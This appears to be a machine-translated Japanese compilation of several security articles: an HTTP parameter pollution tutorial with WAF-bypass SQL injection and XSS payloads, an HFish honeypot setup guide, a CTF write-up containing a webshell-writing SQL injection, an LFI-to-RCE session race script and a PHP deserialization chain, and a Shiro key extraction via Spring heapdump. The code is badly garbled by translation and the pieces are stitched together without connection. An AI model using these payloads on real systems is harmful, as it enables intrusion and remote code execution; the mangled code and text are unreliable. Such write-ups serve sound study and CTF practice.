Baiduは、Baidu怜玢を蚱可するこずずしおそれを理解したす110最初のパラメヌタヌを遞択し、2番目のパラメヌタヌを攟棄したす。

Yahooは、Yahoo Search911を尋ねるこずを理解し、2番目のパラメヌタヌを遞択し、最初のパラメヌタヌをあきらめたした。

Googleは、Googleの怜玢を蚱可するこずずしお理解したす110 911同時に2぀のパラメヌタヌを遞択したす。

䞻なこずは、これらの3぀の状況です。これは䞻に、さたざたなWebサむトによる凊理パラメヌタヌを凊理するさたざたな方法が原因です。

### HPPパラメヌタヌ汚染攻撃方法

HTTPパラメヌタヌ公害、たたはHPPは、Webサむトがナヌザヌ入力を受け入れ、それを䜿甚しお他のシステムに送信されたHTTP芁求を生成し、ナヌザヌ出力を確認しないずきに発生したす。サヌバヌバック゚ンドたたはクラむアントを介しお、2぀の方法で生成されたす

1。クラむアントぞの攻撃

たずえば、2人の候補者の間で他の人の間で投祚するために䜿甚されるりェブサむトがありたす。このWebサむトのURLずコヌドは次のずおりです。

URL : http://host/letheme.jsppoll_id=4568

link1: a href='lote.jsppoll_id=4568candidate=zhang' zhang san/aの投祚

link2: a href='bote.jsppoll_id=4568candidate=li' li si/aの投祚

さたざたな理由で、このペヌゞで投祚に䜿甚されるリンクの実装は次のずおりです。悪意のある攻撃者が次のURLを生成し、有暩者に送信する堎合

http_: //host/letheme.jsppoll_id=4568candidate=zhang

その埌、ペヌゞの最終コンテンツは次のずおりです。

URL : http://HOST/chollect.jsppoll_id=4568candidate=zhang

link1: a href='lote.jsppoll_id=4568candidate=zhangcandidate=zhang' zhang san/aの投祚

link2: a href='yot.jsppoll_id=4568candidate=zhangcandidate=li' li si/aの投祚

JSPに぀いおは、同じ名前の2぀のパラメヌタヌがある堎合に最初の倀が取られるため、投祚者が誰を遞択しおも、Zhang Sanは垞に祚に勝ちたす。

䞀般的に蚀えば、クラむアントぞの攻撃は䞀般に次のプロセスであり、ナヌザヌは望たしくないオプションを遞択したす。

fl0kuzostyz9111.gif

2。サヌバヌ偎ぞの攻撃

たずえば、特定のWebサむトの実装は次のずおりです。

void private executebackendRequesthttprequest request{

文字列Action=request.getParameter 'Action';

string user=request.getParameter 'userid';

文字列タヌゲット=request.getParameter 'タヌゲット';

httpRequest 'http://CentralAuthencationServer/checkprivileded.jsp'、 'post'、 'action='+action+'user='+'user+'タヌゲット='+タヌゲット;}

/*このナヌザヌが指定されたアクションを実行する特暩があるかどうかのフィヌドバックを取埗したす。そのような特暩がない堎合は、゚ラヌを返し、それ以倖の堎合はアクションを実行し続けたす*/

httpRequest 'http://BusinessServer/performance.php'、 'post'、 'action='+action+'user='+user+'タヌゲット='+タヌゲット;}

ナヌザヌ蚱可を認蚌するための独立した集䞭認蚌サヌバヌを備えおおり、別のサヌビスサヌバヌがビゞネスの凊理に特別に䜿甚されおいたす。倖郚ポヌタルは、実際にはリク゚ストを転送するためにのみ䜿甚されたす。次に、以䞋のリク゚ストをサヌバヌに送信する堎合は、元々読み取り専甚暩限を持っおいたナヌザヌを芋おください。

http://www.backlion.org/page?action=viewuserid=zhangsantarget=bizreportaction=edit

したがっお、Web Serverパラメヌタヌの凊理を知っおいる方法に応じお、このナヌザヌは認蚌を通じお行う蚱可を持たないこずを行うこずができたす。

Webサヌバヌ

関数を取埗するパラメヌタヌ

取埗したパラメヌタヌ

PHP/Apache

$ _get "par"

最埌

JSP/Tomcat

request.getParameter "par"

初め

### HPPパラメヌタヌ汚染のヒント

HPPは、攻撃者がいく぀かのWebアプリケヌションファむアりォヌルWAF、WebAppファむアりォヌルをバむパスするために䜿甚するこずもできたす。 HTTPパラメヌタヌ汚染泚入は、Webサむトで提出された同じパラメヌタヌを凊理するさたざたな方法によっお匕き起こされたす。

䟋えば

www.backlion.org/a?key=abkey=3

サヌバヌが入力キヌの倀を返す堎合、

1AB

23

3AB3

これらの3぀の異なる方法。

特定のサヌバヌ凊理方法は次のずおりです。

Webサヌバヌ

関数を取埗するパラメヌタヌ

取埗したパラメヌタヌ

PHP/Apache

$ _get "par"

最埌

JSP/Tomcat

request.getParameter "par"

初め

PerlCGI/Apache

param "par"

初め

Python/Apache

getValue "par"

すべおリスト

ASP/IIS

request.querystring "par"

allComma Delimited文字列

入力www.backlion.org/a?key=selectkey=1,2,3,4をテヌブルから仮定したす

サヌバヌは、テヌブルから1,2,3,4を遞択しおキヌを凊理し、SQL泚入をもたらしたす

たずえば、特定のペヌゞのSQLむンゞェクション攻撃は次のずおりです。

show_user.aspxid=5; select+1,2,3+from+users+where+id=1---

この攻撃は、パラメヌタヌIDselect . from .しかし、hppに倉曎されおいる堎合、Select .から明らかなSQLむンゞェクションテンプレヌトがあるため、WAFによっお正垞に傍受されたす。

show_user.aspxid=5; select+1id=2Id=3+from+users+where+id=1--

珟時点では、selectの特性を持぀パラメヌタヌはありたせん。

PHPは、以䞋のWAF:をバむパスするために䜿甚できたす

http://www.xishaonian.com/hello.php?id=select 1ID=2,3,4から管理者

この状況は、WAFをバむパスするためにも䜿甚し、もちろんXSSず組み合わせるこずもできたす。

### HPPパラメヌタヌ汚染ケヌス

ケヌス12009幎、ModSecurityフィルタヌは、ブラックリストに登録されたテヌブルからSelect1,2,3などのステヌトメントを分類したす。 Webサヌバヌが /index.aspx?page=select 1,2,3のようなステヌトメントに遭遇するず、リク゚ストがブロックされたす。ただし、このWebサヌバヌが同じパラメヌタヌに割り圓おられた異なる倀に遭遇するず、それらを接続したす。攻撃者は、この方法を介しおブラックリストをバむパスできたす。たずえば、次のURLを送信したす。

/index.aspx?page=select 1Page=2,3mからテヌブルから

たず第䞀に、これはブラックリストのパタヌンではなく、ブラックリストむンタヌセプト関数をトリガヌしたせん。第二に、Webプログラムは接続操䜜、぀たりシンボルの前埌にコンテンツを接続するため、SQLむンゞェクションの動䜜を実行できたす。

ケヌス2このケヌスは、倚くのUNIXシステムで䜿甚されおいる印刷システムであるApple Cupsに関するものです。次の方法を䜿甚しおXSS攻撃を詊しおください。

http://127.0.0.1:631/admin/kerberos=onmouseover=alert1kerberos

この怜蚌システムは、空の2番目のKerberosの倀のみを採甚しおいるため、トリガヌされないため、この方法はシステムの怜蚌メカニズムをバむパスするために䜿甚できたす。最初のKerberosは、動的なHTMLコンテンツの構築に䜿甚されるたで確認されたせんでした。最埌に、JavaScriptステヌトメントはWebサむトのコンテキストで実行されたす

ケヌス3倚くの支払いリンクには抜け穎がある堎合がありたす。䞀方で、支払いリンクには䞀般に、重芁なパラメヌタヌで構築された眲名がありたす。これらの眲名は、特定の重芁なフィヌルドで構成され、同じ名前のフィヌルドを远加した埌。眲名時に最初の支払い金額パラメヌタヌが怜蚌される可胜性がありたす。ただし、実際の支払いが䜿甚されるず、埌続の支払い額パラメヌタヌが䜿甚され、眲名が囲たれたす。

次のサむトがあるずしたす。3https://www.example.com/transfermoney.php。これは、次のパラメヌタヌを䜿甚しお、POSTメ゜ッドからアクセスできたす。

金額=1000 FromAccount=12345

申請がリク゚ストを凊理するず、他のバック゚ンドシステムぞの独自のPOSTリク゚ストを生成したす。これは、実際に固定されたToAcCcccccccarterパラメヌタヌを䜿甚しおトランザクションを凊理したす。

個別のバック゚ンドURLhttps://BackEnd.example/dotransfer.php

個別のバック゚ンドパラメヌタヌtoaccount=9876amount=1000 FromAccount=12345

ここで、バック゚ンドが重耇パラメヌタヌが提䟛されたずきに最埌のパラメヌタヌのみを受け入れ、攻撃者がWebサむトに送信されたPOSTリク゚ストを倉曎しおToAcCountパラメヌタヌを送信するず仮定したす。

金額=1000 FromAccount=12345ToAccount=99999

HPPの脆匱性を備えたサむトは、このような別のバック゚ンドシステムにリク゚ストを転送したす。

toaccount=9876amount=1000 -FromAccount=12345ToAccount=99999PHPプロセスの最埌のパラメヌタヌ倀、぀たり99999

ここでは、悪意のあるナヌザヌが提出した2番目のToaccountパラメヌタヌは、バック゚ンドリク゚ストを䞊曞きし、システムによっお蚭定された予想アカりントの代わりに、悪意のあるナヌザヌのトレヌニングアカりント99999にお金を転送したす9876。

これは、攻撃者が自分の芁求を倉曎し、脆匱なシステムで凊理する぀もりである堎合に非垞に䟿利です。しかし、攻撃者が別のポむントからリンクを䜜成し、ナヌザヌに攻撃者が添付した远加のパラメヌタヌを䜿甚しお悪意のあるリク゚ストを誀っお送信するように誘導できる堎合、攻撃者にずっおより実甚的になる可胜性がありたす。

ケヌス4䞀方、HPPクラむアントは、远加のパラメヌタヌをリンクやその他のSRC属性に泚入するこずを䌎いたす。 OWASPの䞀䟋では、次のコヌドがあるずしたす。

 $ val=htmlspecialchars$ _ get ['par']、ent_quotes; a href='/page.phpaction=viewpar='。=$ val ''私を芋る/a

URLからのPARの倀を受け入れ、安党であるこずを保蚌し、そこからリンクを䜜成したす。さお、攻撃者が提出した堎合

http://host/page.phppar=123action=edit

結果のリンクは次のずおりです。

a href='/page.phpaction=viewpar=123action=edit'View me/a

これにより、アプリケヌションは操䜜を衚瀺する代わりに線集操䜜を受け入れたす

### HPPパラメヌタヌ公害リスト

1。ハッケロン゜ヌシャル共有ボタン

レポヌト接続https://hackerone.com/blog/introducing-signal-and-Impact

脆匱性の説明Hackeroneには、Twitter、Facebookなどの有名な゜ヌシャルメディアサむトでコンテンツを共有するためのリンクが含たれおいたす。これらの゜ヌシャルメディアリンクには、゜ヌシャルメディアリンクに䜿甚される特定のパラメヌタヌが含たれおいたす。

攻撃者は、別のURLパラメヌタヌをリンクに远加しお、被害者をクリックしお誘い蟌むこずができたす。 Hackeroneには、゜ヌシャルメディアサむトに送信されたPOSTリク゚ストのパラメヌタヌの倉曎が含たれおいるため、脆匱性が生じたす。脆匱性レポヌトで䜿甚される䟋は、URLを配眮するこずです。

https://hackerone.com/blog/introducing-signal

修正

https://hackerone.com/blog/introducing-signal?u=3https://vk.com/durov

远加のパラメヌタヌuに泚意しおください。埌続のUパラメヌタヌの倀を倉曎しお、被害者を誘い出しお゜ヌシャルメディアリンクを介しおコンテンツを共有しようずするず、悪意のあるリンクが次のようになりたす。

https://www.facebook.com/sharer.php?u=https://hackerone.com/blog/introducing-signal?u=https://vk.com/durov

ここでの最埌のパラメヌタヌuは、最初のパラメヌタヌよりも優先床が高く、Facebookの公開には埌で䜿甚されたす。 Twitterに投皿するず、掚奚されるデフォルトのテキストも倉曎されたす。

https://hackerone.com/blog/introducing-signal?u=33https://vk.com/durovtext=another_site:3359vk.com/durov

2。 Twitterが登録解陀

レポヌト接続https://blog.mert.ninja/twitter-hpp-vulnerability/

脆匱性の説明2015幎8月、ハッカヌのMert Tasciは、Twitterの受信のケアをキャンセルしたずきに興味深いURLに気付きたした。

https://twitter.com/i/u?t=1cn=bwvsig=657iid=f6542uid=1134885524nid=22+26

パラメヌタヌUIDはTwitterアカりントUIDである可胜性があるこずに泚意しおください。これで、圌がほずんどのハッカヌがするず思うこずに泚意を払い、UIDを他のナヌザヌに倉曎しおみおください。Twitterぱラヌを返したした。他の方法が攟棄された可胜性があるこずを考慮しお、Mertは2番目のUIDパラメヌタヌを远加したため、URLは次のようになりたす。

https://twitter.com/i/u?iid=f6542UID=2321301342UID=1134885524NID=22+26それから成功したした。圌は他のナヌザヌのメヌルリマむンダヌからの登録を解陀するこずができたした。これは、TwitterからのHPP解陀の脆匱性があるこずを瀺しおいたす。

3。 Twitter Webむンテント

レポヌトリンクhttps://ericrafaloff.com/parameter-tampering-attack-on-twitter-web-intents

脆匱性の説明Archive Twitter Web Intentsによるず、TwitterナヌザヌTweet、返信、リツむヌトなどを凊理するためのポップアップ最適化されたデヌタストリヌムを提䟛したす。これにより、ナヌザヌはペヌゞを離れたり、新しいアプリの察話を蚱可するこずなく、サむトコンテキストでTwitterコンテンツず察話できたす。これがその䟋です

vzwufgumcdp9112.jpg

完党なテストの埌、ハッカヌの゚リック・ラファロフは、4぀の意図タむプすべおが、ツむヌト、転送、ツむヌトなどのナヌザヌがすべおHPPの脆匱性を持っおいるこずを発芋したした。

2぀のscreen_nameパラメヌタヌを持぀URLを䜜成する堎合

https://twitter.com/intent/follow?screen_name=twitterscnreen_name=erictest3

Twitterは2番目のscreen_nameを凊理したす。これは、最初のscreen_nameよりも優先されたす。 Webフォヌムによるず、このようなもの

form class='follow' id='follow_btn_form'action='/intent/followscreen_name=er \ icrtest3'method='post'input type=' hidden'name='真正性_token'value=' . '

入力型='hidden'name=' screen_name'value='twitter'

入力型='hidden'name=' profile_id'value='783214'

ボタンclass='button'type='送信'

b/bstrongfollow/strong

/ボタン

/圢状

被害者は、screen_name twitterでナヌザヌプロファむルが定矩されおいるのを芋たすが、ボタンをクリックするず、erictest3に埓いたす。

同様に、likeの意図を提瀺する堎合、゚リックはscreen_nameパラメヌタヌを含めるこずができるこずを発芋したしたが、このツむヌトのようには䜕の関係もありたせん。

https://twitter.com/intent/like?tweet_id=6616252302978211845screen_name=erictest3

このツむヌトのように、犠牲者に正しいナヌザヌプロファむルが衚瀺されたすが、「フォロヌ」をクリックした埌、erictest3に続きたす。

###脆匱性防埡

1.HPPは、新しい泚入の脆匱性です。この脆匱性を防ぐために、入力パラメヌタヌの圢匏を確認するこずに加えお、HTTPプロトコルが同じ名前のパラメヌタヌを蚱可するこずを認識する必芁もありたす。申請プロセス党䜓で、これを認識し、サヌビスの特性に埓っおそのような状況を正しく凊理する必芁がありたす。

2.WAFたたは他のゲヌトりェむデバむスIPSなどに、URLをチェックするずきに特別な凊理を行わせたす。 HTTPプロトコルはURLに同じパラメヌタヌを耇数回衚瀺できるようにするため、この特別な治療には過倱臎死の状況を回避するために泚意が必芁です。

3.コヌドレベルでは、Webプログラムを䜜成するずきは、合理的な$ _GETメ゜ッドを介しおURLのパラメヌタヌ倀を取埗し、Webサヌバヌによっお返された他の倀をプログラムに取埗しようずする堎合は泚意しおください。

HireHackking

1。序文

HFishは、Golangに基づいお開発されたクロスプラットフォヌムの倚機胜攻撃ハニヌポットフィッシングプラットフォヌムフレヌムワヌクシステムです。゚ンタヌプラむズセキュリティ保護テストのために慎重に䜜成されおいたす。リリヌスバヌゞョンのダりンロヌドリンクhttps://github.com/hacklcx/hfish/releases github: 3https://github.com/hacklcs/hfish倚機胜は、HTTPsのフィッシングをサポヌトするだけでなく、SSH、sftp、mysql、ftp、telnet、ftp、telnet、sftp、telnet、sftp、telnet、sftp、telnet、sftp、sftp、sftp、sftp、sftp、sftp、sftp、telnet、 APIむンタヌフェむスが提䟛され、ナヌザヌはフィッシングモゞュヌルWeb、PC、アプリの利䟿性を自由に拡倧できたす。 Golang Developmentを䜿甚しお、ナヌザヌはWin + Mac + Linuxを䜿甚できたす。フィッシングプラットフォヌムのセットを

2。クラスタヌ構造

にすばやく展開できたす。1。環境説明Client01:66.42.68.123クラむアント1CLINET0233601444.202.85.37クラむアント1Server33:4.156.253.44 root@server:~#wgethttps://github.com/hacklcx/hfish/releases/download/0.6.4/hfish-0.6.4-linux-amd64.tar.gz 1049983-20201218100926918-462635022.pngROOT@server:〜VI Config.iniステヌタスを1に倉曎する必芁がありたす。バックグラりンドパスワヌドは耇雑なパスワヌドに倉曎されたす。 DB_STRデヌタベヌスの生産環境は、MySQLリモヌト接続を䜿甚するこずをお勧めしたす。ここでは、SQLiteデヌタベヌスをテストしたす。 APIク゚リず報告された認蚌キヌは、独自のAPIキヌに倉曎できたす。1049983-20201218100927394-836487963.png hfishconfig.iniweblibsWebディレクトリはWebハニヌポットを起動せずに削陀できたすのみを保持し、他のすべおを削陀するこずができたすroot@client01:〜wget https://github.com/hacklcx/hfish/releases/download/0.6.4/hfish-0.6.4-linux-amd64.tar.gz 1049983-20201218100927825-1035842484.pngその埌、コマンドを実行しおサヌバヌサヌビスを開始したす。クラむアントサヌビス1 root@client01:〜tar zxvf hfish-0.6.4-linux-amd64.tar.gz 1049983-20201218100928173-1656190452.pngを保持するhfishconfig.iniweblibsのみを保持したすWebハニヌポットを起動せずにWebディレクトリを削陀できたす。

root@client01:〜rm -rf admin/db/images/static/1049983-20201218100928450-1425609273.png5root@client01:〜vi config.iniステヌタスは2に倉曎する必芁があり、Addrアドレスずポヌトをサヌバヌ偎1049983-20201218100928819-873805531.pngおよびcustomer2を開始するIPおよびポヌトに倉曎する必芁がありたす。カスタマヌサヌビスサむド2むンストヌルおよび構成ルヌト@client02:〜rm -rf admin/db/db/static/1049983-20201218100929216-2142589282.pngroot@client02:〜vi config.iniステヌタスは2に倉曎する必芁がありたす。 service./hfishrun3。むンタヌフェむスディスプレむ1049983-20201218100930223-1953739413.png 1049983-20201218100930731-183213565.png 1049983-20201218100931239-1575533902.png4。監芖スクリプト/opt/monitor.sh:/bin/bash procnum=`ps -ef | grep 'hfish' | grep -v grep | wc -l`if [$ procnum -eq 0];次に、cd/root/hfish nohup ./hfish run output.log 21 fi 1049983-20201218100931602-1268301568.pngcrontab -e */1 * * * * * sh /opt/monitor.shwrite content、1分で1回実行する

:wq 保存しお終了したす。サヌバヌがCrontab Service 1049983-20201218100932044-881663273.png5を起動するかどうかを確認しおください。ブラックリストIPク゚リhttp://104.156.253.44:9001/api/v1/get/ipkey=x85e265d965b1929148d0f0e3331331049983-20201218100932458-1549269737.png6。すべおのアカりントパスワヌド情報を取埗http://104.156.253.44:9001/api/v1/get/passwd_listkey=x85e2ba265d965b1929148d0f0e33133 1049983-20201218100932793-1434906860.png157。すべおのフィッシング情報を取埗3http://104.156.253.44:9001/api/v1/get/fish_infokey=x85e2bba265d965b1929148d0e333133 1049983-20201218100933251-1756258035.png88d0 Start the dark web honeypot root@server:/opt# apt-get install tor 1049983-20201218100933737-1908195242.png Modify the configuration vi /etc/tor/torrc file HiddenServiceDir /var/lib/tor/hidden_service/# Add tor web directory HiddenServicePort 80 127.0.0.1:8080 # Map the website 8080 port of the local dark web to theダヌクWeb 1049983-20201218100934159-1946101710.pngのポヌト80のポヌト80を再起動torrootroot@server:Service Torstart 1049983-20201218100934463-2053248676.pngダヌクWebドメむン名CAT/VAR/LIB/TOR/HIDDED_SERVICE/HOSTNAME 1049983-20201218100934732-1173479510.pngダヌクりェブりェブハニヌポットにアクセスする

TOR公匏りェブサむト: https://www.torproject.orgをダりンロヌドするTORブラりザのダりンロヌドシステムの察応するバヌゞョンをむンストヌルしおください。

9.プロキシテスト方法は、端子:HTTP_PROXY=http://127.0.0.1:8081で次のコマンドを実行したす。カスタムハニヌポットを远加config.ini [pot_name] status=1ADDR=0.0.0.0:5901INFO={{addr}}ハニヌポットをスキャンする

構成パラメヌタヌPOT_NAMEハニヌポット名のステヌタスHoneypot 1を起動するかどうか0閉じたすaddr honeypotサヌバヌアドレス情報アラヌムコンテンツ、** {{addr}} **オプションでは、IP11を曞いた埌に攻撃者に眮き換えられたす。脅嚁むンテリゞェンスにリンク1049983-20201218100935564-1640520410.png 1049983-20201218100935984-1689858645.png12.WEBフィッシングWebフィッシング、デフォルトはWordPressテンプレヌトです。OAたたはExchange Mailbox 1049983-20201218100936390-963090418.png13などのテンプレヌトをカスタマむズおよび倉曎できたす。電子メヌルアラヌムメヌルアラヌムを蚭定するず、正しいアカりントずパスワヌドを蚭定する必芁がありたす。ここのパスワヌドは、承認コヌド1049983-20201218100936776-1826452694.png 1049983-20201218100937317-565643156.jpg 1049983-20201218100938004-1297198391.png 1049983-20201218100938368-1039501689.pngです。

HireHackking

web

mmmmd5d5d5d5

リンクオヌプンペヌゞ

image

バむパス

a []=1b []=2

image

MD5を構築したす

php

for$ i=0; $ i=100000; $ i ++

{

ifsubstrmd5$ i、5、5==='3ddc6'

{

echo $ i;

壊す;

}

}



次のレベルを入力したす

image

提出する

ffiffdyop

埗る

php

error_reporting0;

「flag.php」を含める;

highlight_file__ file__;

if$ _ post ['param1']==$ _ post ['param2'] md5$ _ post ['param1']==md5$ _ post ['param2']{

echo $ flag;

}

image

ペむロヌドを構築したす

param1 []=1param2 []=2

フラグを取埗できたす

edgnbサむンむン

Dockerデスクトップバヌゞョンを盎接開きたす

image

フラグを取埗できたす

タむムタワヌの宝物

リンクログむンボックスが開きたす

image

ペむロヌドを構築したす

pswd=adminusname=admin 'union select 1、'php eval$ _ post [1]; ' Into Outfile '/var/www/html/1203.php';#

image

Ant Sword Connect1203.Php、パスワヌドは1、フラグを取埗できたす

image

lfi_to_rce

php

show_source './index.php';

$ _get ['file']を含める;



è­Šå‘Š: include:ファむル名は/var/www/html/index.phpで空にするこずはできたせん。

è­Šå‘Š: include: inclusioninclude_path='。/usr/local/lib/php'のinclusioninclude_path='。

expに投皿

リク゚ストをむンポヌトしたす

IOをむンポヌトしたす

スレッドをむンポヌトしたす

url='http://81.70.102.209:10040/index.php'

sessid='21r000 '

def writeセッション:

filebytes=io.bytesiob'a ' * 1024 * 50

true:

res=session.posturl、

data={

'php_session_upload_progress':'php eval$ _ post [1]; '

}、

Cookie={

'phpsessid': sessid

}、

files={

'file':' 21r000.jpg '、filebytes

}



def readsession:

true:

res=session.posturl+'file=/tmp/sess _'+sessid、

data={

'1':'system' ls /';'

}、

Cookie={

'phpsessid':sessid

}



res.text:の「etc」の堎合

印刷res.text

__name__=='__main __' :の堎合

evnet=threading.event

session:ずしおrequests.sessionを䜿甚

範囲のIの堎合5:

threading.threadtarget=write、args=session、。start

範囲のIの堎合5:

threading.threadタヌゲット=read、args=session、。start

evnet.set

image

旗を獲埗するために蚪問したす

unserialize

php

error_reporting0;

「hint.php」を含める;

クラスX {

public $ value;

public $ cc;

function __wakeup{

Die 'Fighting !';

}

}

クラスA {

public $ nice;

パブリック関数__Destruct

{

$ this-nice=unserialize$ this-nice;

$ this-nice-value=$ fake;

if$ this-nice-value===$ this-nice-cc

$ this-test-good;

}

}

クラスB {

public $ value;

public $ array;

public function good{

ifis_array$ this-array{

$ this-array$ this-value;

}

それ以倖{

echo 'must_array';

}

}

}

クラスC {

public $ value;

パブリックファンクションシェル$ func{

ifpreg_match '/^[a-z0-9]*$/isd'、$ func{

die 'y0u_a2e_hackk';

}

それ以倖{

$ func$ this-value;

}

}

}

ifisset$ _ get ['pop']{

$ pop=base64_decode$ _ get ['pop'];

unserialize$ pop;

} それ以倖{

highlight_file__ file__;

}

ポップチェヌンの問題は、A2からA3に倉曎されたす

pop=tzoxoijhijozontzojq6im5py2uio3m6mzc6ik86mtoieci6mjp7czo1oij2ywx1zsi7tjtzoji6imnjijtoo330io33m6n6n6ndoidgvzdci7tzoxoxoxoxoijiyjontzoju6inz hbhvlijtzojc6ilxzexn0zw0io3m6ntoiyxjyyxkio2e6mjp7atowo086mtoiyyi6m tp7czo1oij2ywx1zsi7czo5oijyxqgl2zsywcio31poje7czo1oijzagvsbci7fx19

PACをポスト

php

クラスX {

public $ value;

public $ cc;

パブリック関数__construct

{

$ this-value=$ fake;

$ this-cc=$ fake;

}

function __wakeup{

Die 'Fighting !';

}

}

クラスA {

public $ nice;

パブリック関数__construct

{

$ this-nice=serializenew X;

$ this-test=new b;

}

パブリック関数__Destruct

{

$ this-nice=unserialize$ this-nice;

$ this-nice-value=$ fake;

if$ this-nice-value===$ this-nice-cc

$ this-test-good;

}

}

クラスB {

public $ value='\ system';

public $ array;

パブリック関数__construct

{

$ this-array=[new c、 'shell'];

}

public function good{

ifis_array$ this-array{

$ this-array$ this-value;

}

それ以倖{

echo 'must_array';

}

}

}

クラスC {

public $ value='cat /flag';

パブリックファンクションシェル$ func{

ifpreg_match '/^[a-z0-9]*$/isd'、$ func{

die 'y0u_a2e_hackk';

}

それ以倖{

$ func$ this-value;

}

}

}

$ a=new a;

echo serialize$ a;

echo 'br';

echo base64_encodeserialize$ a;



Misc

公匏アカりントya

に来おください

image

コヌドをスキャンするだけです

jamesharden

添付ファむルをダりンロヌドしお枛圧し、ファむルの接尟蟞を倉曎したす。zipを远加した埌、枛圧ファむルは.classファむルです。

image

rot13 urpgsの埩号化{jr1p0zr_g0_u3pg6_}フラグを取埗するには

image

隠れ暡様

添付ファむルは、Wordドキュメントずしおファむルを開きたす

image

テキストのプロンプトによるず、構成コンテンツのフォントサむズを12に倉曎したす

jsfuck暗号化ずしお発芋されたした

image

http://codetab.com/jsunfuckオンラむンWebサむト埩号化

フラグを埩号化したす

image

倱われた犬

アタッチメントが開きたす

image

Lost Dogフォルダヌを開きたす

image

圧瞮パッケヌゞに画像がありたすが、パスワヌドが必芁です

Ziperelloでのブルヌトフォヌスクラッキングを䜿甚し、文字セットを番号に蚭定したす

image

image

パスワヌドは142345であり、ファむルが正垞に解凍されお写真を取埗するために

image

KaliのBinwalkを䜿甚しおファむルコンテンツを分析したす

image

隠された画像にjpgファむルが隠されおいるこずがわかりたした

ファむルを取り倖すには、最優先事項を䜿甚したす

image

2番目の画像はフラグを瀺しおいたす

image

ヘビ

6000ポむントに達したずきにチップがありたした

image

゜ヌスコヌドをトレヌスしたす

image

show_text関数を改造したす

image

image

pyinstallerが困惑した埌、snake.pycがありたす。 PYをPYに分解した埌、それはその゜ヌスコヌドです。

image

image

旗を獲埗

image

質問

眲名しお戻っおきお、次回続行したす。

crypto

サむンむン

添付ファむルが開きたす

image

犅に関する仏教の犅の論文を解読しお、䞀連のbase64暗号テキストを取埗する

skjdvudwq0dqtlrxnjmzruw1v0hlwtnmtdvurzy0uzdqrlhyszdjpq==

埩号化埌、フラグを取埗するためのbase32埩号化

image

rsa_e_n

添付ファむル

image

RSAでE、N、Cを埩号化し、スクリプトを盎接入力しおください。

gmpy2をむンポヌトしたす

rsawienerhackerをむンポヌトしたす

E=0x14B367BF01EFD4DC667B8E62975479C612C96E78F7F1F55242B2973C882DDC B33A65C52174D8AE1273764CE429054EA3F2FDC38FF205443C92EF4198739F05A A11FC10D3FC6FF30C8F5F05A04F43E3D8FC9BFFFE916B2E0360560A162729E91 B7775BDA70177E0F875626E0A81BD4EACEA9948B02232A82659F8D9AA9B4C754F

n=0x75BE564267F8BF6C2038DD0CADFEECBC3158ACFC27E679DD0BDB0DB0E90BD5 198A0A7EDC0626F357A2D75F3C37EDE045B7F7CA6BDA79E5BF6FC0AEA0AA7BEDA 587388599D2B77B538FC3E66666784493FFAF731E2AE232E8E9E9F9F2A4DF25C19 B7680F5BF6C485BD87923F01C17D8EC3543872C28E361774E6E7681D67ECBE19

C=1012765995653419108589656976567211665272051837730881475431227052308080885503362715840499693807070951204

HireHackking

1。はじめに

Spring HeapdumpがShiro Keyを挏らし、したがっおRCEを挏らし、脆匱な環境を構築したした。 GitHubアドレスhttps://Github.com/p4r4d1se/heapdump_shiro_vuln

脆匱性の悪甚条件

Spring Shiro環境にはHeapdumpファむルの挏れず搟取可胜なチェヌンがありたす。

2。脆匱性の原則

倚くの倧物は、シロ関連の脆匱性の原則ずデバッグ分析を共有しおいたす。ここでは詳しく説明したせん。私は䞻にこの脆匱性環境を説明したす

1Springには実際にSpring Securityず呌ばれる独自のデフォルトのセキュリティフレヌムワヌクがありたすが、Shiroの䜿甚にはいく぀かの開発が䜿甚され、Spring SecuriyをShiroに眮き換えたす。この状況は珍しいこずではありたせん。たずえば、RuoyiはSpring Shiroです。

1049983-20221205094141235-716240315.jpg2キヌがある堎合、シロの最新バヌゞョンでさえ䟝然ずしお脆匱性があり、倚くの堎合、開発、展開、その他の問題によりシロのキヌが挏れたす。

3Shiroが1.2.4を超えるバヌゞョンでは、開発者の手動介入なしにキヌがランダム生成に倉曎されたす。このランダム生成は、Web環境が開始されるたびに再起動する前にキヌが倉曎されないこずです。 JVM仮想マシンメモリにありたす。

1049983-20221205094142103-2055517121.jpg4SpringのHeapdumpファむルは、JVM仮想マシンメモリから゚クスポヌトされたす。

芁玄するず、この組み合わせの脆匱性が䜜成されたした。

3。脆匱性の実蚌

脆匱な環境を読み蟌んだ埌、シロバヌゞョンが1.8.0であるこずがわかりたす。

1049983-20221205094143073-114670788.jpg

ポヌト8080で /アクチュ゚ヌタ /heapdumpにアクセスしお、heapdumpファむルを取埗したす。

1049983-20221205094143969-554120927.jpg

シロのキヌを取埗するためによく䜿甚する方法は2぀ありたす。

1jdumpspiderhttps://github.com/whwlsfb/jdumpspider

このりィゞェットは、Heapdumpの倉動情報を自動的にクロヌルするこずができたすが、これはより䟿利です。欠点は、クロヌルリストにない情報を芋逃す可胜性があるこずです。

:javaを盎接実行したす-jar jdumpspider.jar heapdump倉数情報を自動的に取埗したす。ここでは、Shirokeyを入手しおください1049983-20221205094144681-379271828.jpg2jvisualvm.exeJava独自のツヌル、デフォルトパスはJDKディレクトリ/bin/jvisualvm.exeです。

このツヌルは、必芁な情報を手動で芋぀けお、フィルタヌにorg.apache.shiro.web.mgt.cookieremembermemanagerを入力する必芁がありたす。

Pythonスクリプトを䜿甚しお、Base64゚ンコヌドのShiroキヌに倉換したす。Pythonスクリプトを䜿甚しお、Base64゚ンコヌドされたShiroキヌに倉換したす。

base64をむンポヌトしたす

むンポヌト構造

printbase64.b64encodestruct.pack 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb-115,33,59,24,112,44,124,56,110、-15,59,1、-41

1049983-20221205094147320-612137025.jpg

サヌバヌを再起動しお、shiroキヌをもう䞀床取埗したす。キヌが倉曎されたこずがわかりたす。脆匱性の原則の3番目のポむントが怜蚌されたす。開始するたびに、ランダムキヌが生成されたす。

1049983-20221205094148077-2083177773.png

新しいキヌに切り替えるこずは、匕き続き䜿甚できたす。

1049983-20221205094148947-1689724177.jpg

元のリンクから転茉https://xz.aliyun.com/t/11908

HireHackking

最初の方法Hydra

